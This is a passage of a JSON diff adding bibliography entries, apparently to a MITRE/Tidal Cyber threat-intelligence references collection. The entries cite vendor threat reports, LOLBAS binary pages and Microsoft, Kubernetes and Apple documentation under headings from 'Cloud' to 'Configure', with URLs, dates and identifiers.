style" + }, + "related": [], + "uuid": "41a9b3e3-0953-4bde-9e1d-c2f51de1120e", + "value": "Kaspersky Cloud Atlas December 2014" + }, + { + "description": "Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "date_published": "2019-09-01T00:00:00Z", + "refs": [ + "https://github.com/RhinoSecurityLabs/ccat" + ], + "source": "MITRE", + "title": "Cloud Container Attack Tool (CCAT)" + }, + "related": [], + "uuid": "ac31b781-dbe4-49c2-b7af-dfb23d435ce8", + "value": "Rhino Labs Cloud Backdoor September 2019" + }, + { + "description": "Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://cloud.google.com/storage" + ], + "source": "MITRE", + "title": "Cloud Storage" + }, + "related": [], + "uuid": "5fe51b4e-9b82-4e97-bb65-73708349538a", + "value": "Google Cloud Storage" + }, + { + "description": "Microsoft. (2017, January 23). (Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2017-01-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure" + ], + "source": "MITRE", + "title": "(Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure" + }, + "related": [], + "uuid": "dddf33ea-d074-4bc4-98d2-39b7e843e37d", + "value": "Office 265 Azure Domain Availability" + }, + { + "description": "Pany, D. & Hanley, C. (2023, May 3). Cloudy with a Chance of Bad Logs: Cloud Platform Log Configurations to Consider in Investigations. Retrieved October 16, 2023.", + "meta": { + "date_accessed": "2023-10-16T00:00:00Z", + "date_published": "2023-05-03T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/cloud-bad-log-configurations" + ], + "source": "MITRE", + "title": "Cloudy with a Chance of Bad Logs: Cloud Platform Log Configurations to Consider in Investigations" + }, + "related": [], + "uuid": "a9835fe9-8227-5310-a728-1d09f19342b3", + "value": "Mandiant Cloudy Logs 2023" + }, + { + "description": "Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021.", + "meta": { + "date_accessed": "2021-09-24T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm" + ], + "source": "MITRE", + "title": "CLSID Key" + }, + "related": [], + "uuid": "239bb629-2733-4da3-87c2-47a7ab55433f", + "value": "win_clsid_key" + }, + { + "description": "kubernetes. (2021, January 16). Cluster Administration. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "date_published": "2021-01-16T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/concepts/cluster-administration/" + ], + "source": "MITRE", + "title": "Cluster Administration" + }, + "related": [], + "uuid": "6c5f2465-1db3-46cc-8d2a-9763c21aa8cc", + "value": "Kube Cluster Admin" + }, + { + "description": "kubernetes. (n.d.). cluster-info. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cluster-info" + ], + "source": "MITRE", + "title": "cluster-info" + }, + "related": [], + "uuid": "0f8b5d79-2393-45a2-b6d4-df394e513e39", + "value": "Kube Cluster Info" + }, + { + "description": "Microsoft. (n.d.). Cmd. Retrieved April 18, 2016.", + "meta": { + "date_accessed": "2016-04-18T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490880.aspx" + ], + "source": "MITRE", + "title": "Cmd" + }, + "related": [], + "uuid": "dbfc01fe-c300-4c27-ab9a-a20508c1e04b", + "value": "TechNet Cmd" + }, + { + "description": "LOLBAS. (2019, June 26). Cmd.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-06-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Cmd/" + ], + "source": "Tidal Cyber", + "title": "Cmd.exe" + }, + "related": [], + "uuid": "887aa9af-3f0e-42bb-8c40-39149f34b922", + "value": "Cmd.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Cmdkey.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/" + ], + "source": "Tidal Cyber", + "title": "Cmdkey.exe" + }, + "related": [], + "uuid": "c9ca075a-8327-463d-96ec-adddf6f1a7bb", + "value": "Cmdkey.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2021, August 26). cmdl32.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-08-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/" + ], + "source": "Tidal Cyber", + "title": "cmdl32.exe" + }, + "related": [], + "uuid": "2628e452-caa1-4058-a405-7c4657fa3245", + "value": "cmdl32.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Cmstp.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/" + ], + "source": "Tidal Cyber", + "title": "Cmstp.exe" + }, + "related": [], + "uuid": "86c21dcd-464a-4870-8aae-25fcaccc889d", + "value": "Cmstp.exe - LOLBAS Project" + }, + { + "description": "Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2018-01-30T00:00:00Z", + "refs": [ + "https://twitter.com/NickTyrer/status/958450014111633408" + ], + "source": "MITRE", + "title": "CMSTP.exe - remote .sct execution applocker bypass" + }, + "related": [], + "uuid": "3847149c-1463-4d94-be19-0a8cf1db0b58", + "value": "Twitter CMSTP Jan 2018" + }, + { + "description": "Counter Threat Unit Research Team. (2019, September 11). COBALT DICKENS Goes Back to School…Again. Retrieved February 3, 2021.", + "meta": { + "date_accessed": "2021-02-03T00:00:00Z", + "date_published": "2019-09-11T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again" + ], + "source": "MITRE", + "title": "COBALT DICKENS Goes Back to School…Again" + }, + "related": [], + "uuid": "45815e4d-d678-4823-8315-583893e263e6", + "value": "Secureworks COBALT DICKENS September 2019" + }, + { + "description": "Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2018-10-08T00:00:00Z", + "refs": [ + "https://blog.morphisec.com/cobalt-gang-2.0" + ], + "source": "MITRE", + "title": "Cobalt Group 2.0" + }, + "related": [], + "uuid": "0a0bdd4b-a680-4a38-967d-3ad92f04d619", + "value": "Morphisec Cobalt Gang Oct 2018" + }, + { + "description": "Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.", + "meta": { + "date_accessed": "2021-04-14T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy" + ], + "source": "MITRE", + "title": "COBALT GYPSY Threat Profile" + }, + "related": [], + "uuid": "f1c21834-7536-430b-8539-e68373718b4d", + "value": "Secureworks COBALT GYPSY Threat Profile" + }, + { + "description": "Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.", + "meta": { + "date_accessed": "2021-04-14T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/cobalt-illusion" + ], + "source": "MITRE", + "title": "COBALT ILLUSION Threat Profile" + }, + "related": [], + "uuid": "8d9a5b77-2516-4ad5-9710-4c8165df2882", + "value": "Secureworks COBALT ILLUSION Threat Profile" + }, + { + "description": "Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.", + "meta": { + "date_accessed": "2018-10-09T00:00:00Z", + "date_published": "2016-12-16T00:00:00Z", + "refs": [ + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf" + ], + "source": "MITRE", + "title": "Cobalt Snatch" + }, + "related": [], + "uuid": "2de4d38f-c99d-4149-89e6-0349a4902aa2", + "value": "PTSecurity Cobalt Dec 2016" + }, + { + "description": "Mudge, R. (2017, May 23). Cobalt Strike 3.8 – Who’s Your Daddy?. Retrieved June 4, 2019.", + "meta": { + "date_accessed": "2019-06-04T00:00:00Z", + "date_published": "2017-05-23T00:00:00Z", + "refs": [ + "https://blog.cobaltstrike.com/2017/05/23/cobalt-strike-3-8-whos-your-daddy/" + ], + "source": "MITRE", + "title": "Cobalt Strike 3.8 – Who’s Your Daddy?" + }, + "related": [], + "uuid": "056ef3cd-885d-41d6-9547-a2a575b03662", + "value": "CobaltStrike Daddy May 2017" + }, + { + "description": "Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.", + "meta": { + "date_accessed": "2021-04-13T00:00:00Z", + "date_published": "2020-11-05T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf" + ], + "source": "MITRE", + "title": "Cobalt Strike: Advanced Threat Tactics for Penetration Testers" + }, + "related": [], + "uuid": "eb7abdb2-b270-46ae-a950-5a93d09b3565", + "value": "Cobalt Strike Manual 4.3 November 2020" + }, + { + "description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.", + "meta": { + "date_accessed": "2017-05-24T00:00:00Z", + "date_published": "2017-03-14T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf" + ], + "source": "MITRE", + "title": "Cobalt Strike Manual" + }, + "related": [], + "uuid": "43277d05-0aa4-4cee-ac41-6f03a49851a9", + "value": "cobaltstrike manual" + }, + { + "description": "Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.", + "meta": { + "date_accessed": "2019-03-07T00:00:00Z", + "date_published": "2017-11-20T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/" + ], + "source": "MITRE", + "title": "Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks" + }, + "related": [], + "uuid": "81847e06-fea0-4d90-8a9e-5bc99a2bf3f0", + "value": "TrendMicro Cobalt Group Nov 2017" + }, + { + "description": "Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.", + "meta": { + "date_accessed": "2018-09-05T00:00:00Z", + "date_published": "2017-08-16T00:00:00Z", + "refs": [ + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Cobalt Strikes Back: An Evolving Multinational Threat to Finance" + }, + "related": [], + "uuid": "f4ce1b4d-4f01-4083-8bc6-931cbac9ac38", + "value": "PTSecurity Cobalt Group Aug 2017" + }, + { + "description": "Yadav, A., et al. (2017, August 31). Cobian RAT – A backdoored RAT. Retrieved November 13, 2018.", + "meta": { + "date_accessed": "2018-11-13T00:00:00Z", + "date_published": "2017-08-31T00:00:00Z", + "refs": [ + "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" + ], + "source": "MITRE", + "title": "Cobian RAT – A backdoored RAT" + }, + "related": [], + "uuid": "46541bb9-15cb-4a7c-a624-48a1c7e838e3", + "value": "Zscaler Cobian Aug 2017" + }, + { + "description": "Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "date_published": "2015-09-16T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1" + ], + "source": "MITRE", + "title": "Cocoa Application Layer" + }, + "related": [], + "uuid": "6ada4c6a-23dc-4469-a3a1-1d3b4935db97", + "value": "MACOS Cocoa" + }, + { + "description": "LOLBAS. (2023, February 1). code.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-02-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/HonorableMentions/Code/" + ], + "source": "Tidal Cyber", + "title": "code.exe" + }, + "related": [], + "uuid": "4a93063b-f3a3-4726-870d-b8f744651363", + "value": "code.exe - LOLBAS Project" + }, + { + "description": "Brian Prince. (2014, June 20). Code Hosting Service Shuts Down After Cyber Attack. Retrieved March 21, 2023.", + "meta": { + "date_accessed": "2023-03-21T00:00:00Z", + "date_published": "2014-06-20T00:00:00Z", + "refs": [ + "https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack" + ], + "source": "MITRE", + "title": "Code Hosting Service Shuts Down After Cyber Attack" + }, + "related": [], + "uuid": "e5a3028a-f4cc-537c-9ddd-769792ab33be", + "value": "Dark Reading Code Spaces Cyber Attack" + }, + { + "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2018-07-25T00:00:00Z", + "refs": [ + "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be" + ], + "source": "MITRE", + "title": "Code injection in running process using ptrace" + }, + "related": [], + "uuid": "6dbfe4b5-9430-431b-927e-e8e775874cd9", + "value": "Medium Ptrace JUL 2018" + }, + { + "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", + "meta": { + "date_accessed": "2016-03-31T00:00:00Z", + "date_published": "2015-11-10T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Code_signing" + ], + "source": "MITRE", + "title": "Code Signing" + }, + "related": [], + "uuid": "363e860d-e14c-4fcd-985f-f76353018908", + "value": "Wikipedia Code Signing" + }, + { + "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", + "meta": { + "date_accessed": "2018-04-03T00:00:00Z", + "date_published": "2017-12-22T00:00:00Z", + "refs": [ + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec" + ], + "source": "MITRE", + "title": "Code Signing Certificate Cloning Attacks and Defenses" + }, + "related": [], + "uuid": "3efc5ae9-c63a-4a07-bbbd-d7324acdbaf5", + "value": "SpectorOps Code Signing Dec 2017" + }, + { + "description": "Avira. (2019, November 28). CoinLoader: A Sophisticated Malware Loader Campaign. Retrieved June 5, 2023.", + "meta": { + "date_accessed": "2023-06-05T00:00:00Z", + "date_published": "2019-11-28T00:00:00Z", + "refs": [ + "https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign" + ], + "source": "MITRE", + "title": "CoinLoader: A Sophisticated Malware Loader Campaign" + }, + "related": [], + "uuid": "83469ab3-0199-5679-aa25-7b6885019552", + "value": "CoinLoader: A Sophisticated Malware Loader Campaign" + }, + { + "description": "Nicole Perlroth. (2021, May 13). Colonial Pipeline paid 75 Bitcoin, or roughly $5 million, to hackers.. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "date_published": "2021-05-13T00:00:00Z", + "refs": [ + "https://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html" + ], + "source": "MITRE", + "title": "Colonial Pipeline paid 75 Bitcoin, or roughly $5 million, to hackers." + }, + "related": [], + "uuid": "58900911-ab4b-5157-968c-67fa69cc122d", + "value": "NYT-Colonial" + }, + { + "description": "LOLBAS. (2023, June 26). Colorcpl.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-06-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/" + ], + "source": "Tidal Cyber", + "title": "Colorcpl.exe" + }, + "related": [], + "uuid": "53ff662d-a0b3-41bd-ab9e-a9bb8bbdea25", + "value": "Colorcpl.exe - LOLBAS Project" + }, + { + "description": "Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.", + "meta": { + "date_accessed": "2021-09-13T00:00:00Z", + "date_published": "2020-09-08T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/" + ], + "source": "MITRE", + "title": "Coming Out of Your Shell: From Shlayer to ZShlayer" + }, + "related": [], + "uuid": "17277b12-af29-475a-bc9a-0731bbe0bae2", + "value": "sentinelone shlayer to zshlayer" + }, + { + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "meta": { + "date_accessed": "2016-04-20T00:00:00Z", + "date_published": "2014-02-01T00:00:00Z", + "refs": [ + "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + ], + "source": "MITRE", + "title": "Command & Control Understanding, Denying and Detecting" + }, + "related": [], + "uuid": "113ce14e-147f-4a86-8b83-7b49b43a4e88", + "value": "University of Birmingham C2" + }, + { + "description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.", + "meta": { + "date_accessed": "2017-04-21T00:00:00Z", + "date_published": "2017-03-07T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing" + ], + "source": "MITRE", + "title": "Command line process auditing" + }, + "related": [], + "uuid": "4a58170b-906c-4df4-ad1e-0e5bc15366fa", + "value": "Microsoft Command-line Logging" + }, + { + "description": "Microsoft. (2012, September 11). Command-Line Reference - Netdom Trust. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "date_published": "2012-09-11T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/cc835085.aspx" + ], + "source": "MITRE", + "title": "Command-Line Reference - Netdom Trust" + }, + "related": [], + "uuid": "380dc9fe-d490-4914-9595-05d765b27a85", + "value": "Microsoft Netdom Trust Sept 2012" + }, + { + "description": "Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.", + "meta": { + "date_accessed": "2018-07-03T00:00:00Z", + "refs": [ + "https://www.microsoft.com/download/details.aspx?id=21714" + ], + "source": "MITRE", + "title": "Command Line Transformation Utility (msxsl.exe)" + }, + "related": [], + "uuid": "a25d664c-d109-466f-9b6a-7e9ea8c57895", + "value": "Microsoft msxsl.exe" + }, + { + "description": "Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.", + "meta": { + "date_accessed": "2017-11-22T00:00:00Z", + "date_published": "2014-08-29T00:00:00Z", + "refs": [ + "https://www.contextis.com/blog/comma-separated-vulnerabilities" + ], + "source": "MITRE", + "title": "Comma Separated Vulnerabilities" + }, + "related": [], + "uuid": "2badfb63-19a3-4829-bbb5-7c3dfab877d5", + "value": "Kettle CSV DDE Aug 2014" + }, + { + "description": "Microsoft. (2017, June 19). Common Language Runtime Integration. Retrieved July 8, 2019.", + "meta": { + "date_accessed": "2019-07-08T00:00:00Z", + "date_published": "2017-06-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017" + ], + "source": "MITRE", + "title": "Common Language Runtime Integration" + }, + "related": [], + "uuid": "83fc7522-5eb1-4710-8391-090389948686", + "value": "Microsoft CLR Integration 2017" + }, + { + "description": "Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.", + "meta": { + "date_accessed": "2018-06-07T00:00:00Z", + "date_published": "2018-01-31T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/" + ], + "source": "MITRE", + "title": "Comnie Continues to Target Organizations in East Asia" + }, + "related": [], + "uuid": "ff3cc105-2798-45de-8561-983bf57eb9d9", + "value": "Palo Alto Comnie" + }, + { + "description": "G DATA. (2014, October). COM Object hijacking: the discreet way of persistence. Retrieved August 13, 2016.", + "meta": { + "date_accessed": "2016-08-13T00:00:00Z", + "date_published": "2014-10-01T00:00:00Z", + "refs": [ + "https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence" + ], + "source": "MITRE", + "title": "COM Object hijacking: the discreet way of persistence" + }, + "related": [], + "uuid": "98e88505-b916-430d-aef6-616ba7ddd88e", + "value": "GDATA COM Hijacking" + }, + { + "description": "FRANK BAJAK AND RAPHAEL SATTER. (2017, June 30). Companies still hobbled from fearsome cyberattack. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "date_published": "2017-06-30T00:00:00Z", + "refs": [ + "https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8873e7f9f229c2" + ], + "source": "MITRE", + "title": "Companies still hobbled from fearsome cyberattack" + }, + "related": [], + "uuid": "7f1af58a-33fd-538f-b092-789a8776780c", + "value": "AP-NotPetya" + }, + { + "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", + "meta": { + "date_accessed": "2017-11-22T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx" + ], + "source": "MITRE", + "title": "Component Object Model (COM)" + }, + "related": [], + "uuid": "edcd917d-ca5b-4e5c-b3be-118e828abe97", + "value": "Microsoft COM" + }, + { + "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.", + "meta": { + "date_accessed": "2023-03-09T00:00:00Z", + "date_published": "2022-12-08T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/" + ], + "source": "MITRE", + "title": "Compromised Cloud Compute Credentials: Case Studies From the Wild" + }, + "related": [], + "uuid": "af755ba2-97c2-5152-ab00-2e24740f69f3", + "value": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022" + }, + { + "description": "US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.", + "meta": { + "date_accessed": "2016-06-08T00:00:00Z", + "date_published": "2015-11-13T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA15-314A" + ], + "source": "MITRE", + "title": "Compromised Web Servers and Web Shells - Threat Awareness and Guidance" + }, + "related": [], + "uuid": "61ceb0c4-62f6-46cd-b42b-5736c869421f", + "value": "US-CERT Alert TA15-314A Web Shells" + }, + { + "description": "LOLBAS. (2019, August 30). Comsvcs.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-08-30T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/comsvcs/" + ], + "source": "Tidal Cyber", + "title": "Comsvcs.dll" + }, + "related": [], + "uuid": "2eb2756d-5a49-4df3-9e2f-104c41c645cd", + "value": "Comsvcs.dll - LOLBAS Project" + }, + { + "description": "Joie Salvio and Roy Tay. (2023, June 20). Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389. Retrieved September 5, 2023.", + "meta": { + "date_accessed": "2023-09-05T00:00:00Z", + "date_published": "2023-06-20T00:00:00Z", + "refs": [ + "https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389" + ], + "source": "MITRE", + "title": "Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389" + }, + "related": [], + "uuid": "a92b0d6c-b3e8-56a4-b1b4-1d117e59db84", + "value": "Condi-Botnet-binaries" + }, + { + "description": "Microsoft. (2022, December 14). Conditional Access templates. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-12-14T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/concept-conditional-access-policy-common" + ], + "source": "MITRE", + "title": "Conditional Access templates" + }, + "related": [], + "uuid": "9ed9870b-d09a-511d-96f9-4956f26d46bf", + "value": "Microsoft Common Conditional Access Policies" + }, + { + "description": "Trend Micro. (2014, March 18). Conficker. Retrieved February 18, 2021.", + "meta": { + "date_accessed": "2021-02-18T00:00:00Z", + "date_published": "2014-03-18T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/conficker" + ], + "source": "MITRE", + "title": "Conficker" + }, + "related": [], + "uuid": "62cf7f3a-9011-45eb-a7d9-91c76a2177e9", + "value": "Trend Micro Conficker" + }, + { + "description": "LOLBAS. (2020, September 4). ConfigSecurityPolicy.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-09-04T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/" + ], + "source": "Tidal Cyber", + "title": "ConfigSecurityPolicy.exe" + }, + "related": [], + "uuid": "30b8a5d8-596c-4ab3-b3db-b799cc8923e1", + "value": "ConfigSecurityPolicy.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2020, December 14). Configurable token lifetimes in Microsoft Identity Platform. Retrieved December 22, 2020.", + "meta": { + "date_accessed": "2020-12-22T00:00:00Z", + "date_published": "2020-12-14T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes" + ], + "source": "MITRE", + "title": "Configurable token lifetimes in Microsoft Identity Platform" + }, + "related": [], + "uuid": "8b810f7c-1f26-420b-9014-732f1469f145", + "value": "Microsoft SAML Token Lifetimes" + }, + { + "description": "Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "date_published": "2019-05-03T00:00:00Z", + "refs": [ + "https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf" + ], + "source": "MITRE", + "title": "Configuration Profile Reference" + }, + "related": [], + "uuid": "8453f06d-5007-4e53-a9a2-1c0edb99be3d", + "value": "Apple Developer Configuration Profile" + }, + { + "description": "Apple. (2019, May 3). Configuration Profile Reference, Developer. Retrieved April 15, 2022.", + "meta": { + "date_accessed": "2022-04-15T00:00:00Z", + "date_published": "2019-05-03T00:00:00Z", + "refs": [ + "https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf" + ], + "source": "MITRE", + "title": "Configuration Profile Reference, Developer" + }, + "related": [], + "uuid": "a7078eee-5478-4a93-9a7e-8db1d020e1da", + "value": "MDMProfileConfigMacOS" + }, + { + "description": "Microsoft. (2023, August 29). Configure and approve just-in-time access for Azure Managed Applications. Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "date_published": "2023-08-29T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access" + ], + "source": "MITRE", + "title": "Configure and approve just-in-time access for Azure Managed Applications" + }, + "related": [], + "uuid": "ee35e13f-ca39-5faf-81ae-230d33329a28", + "value": "Azure Just in Time Access 2023" + }, + { + "description": "Cisco. (2022, August 17). Configure and Capture Embedded Packet on Software. Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2022-08-17T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html" + ], + "source": "MITRE", + "title": "Configure and Capture Embedded Packet on Software" + }, + "related": [], + "uuid": "5d973180-a28a-5c8f-b13a-45d21331700f", + "value": "capture_embedded_packet_on_software" + }, + { + "description": "Kubernetes. (n.d.). Configure a Security Context for a Pod or Container. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/tasks/configure-pod-container/security-context/" + ], + "source": "MITRE", + "title": "Configure a Security Context for a Pod or Container" + }, + "related": [], + "uuid": "bd91ec00-95bb-572f-9452-8040ec633e00", + "value": "Kubernetes Security Context" + }, + { + "description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.", + "meta": { + "date_accessed": "2018-04-04T00:00:00Z", + "date_published": "2017-07-19T00:00:00Z", + "refs": [ + "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2" + ], + "source": "MITRE", + "title": "Configure audit settings for a site collection" + }, + "related": [], + "uuid": "9a6a08c0-94f2-4dbc-a0b3-01d5234e7753", + "value": "Microsoft SharePoint Logging" + }, + { + "description": "Microsoft. (n.d.). Configure Network Level Authentication for Remote Desktop Services Connections. Retrieved June 6, 2016.", + "meta": { + "date_accessed": "2016-06-06T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc732713.aspx" + ], + "source": "MITRE", + "title": "Configure Network Level 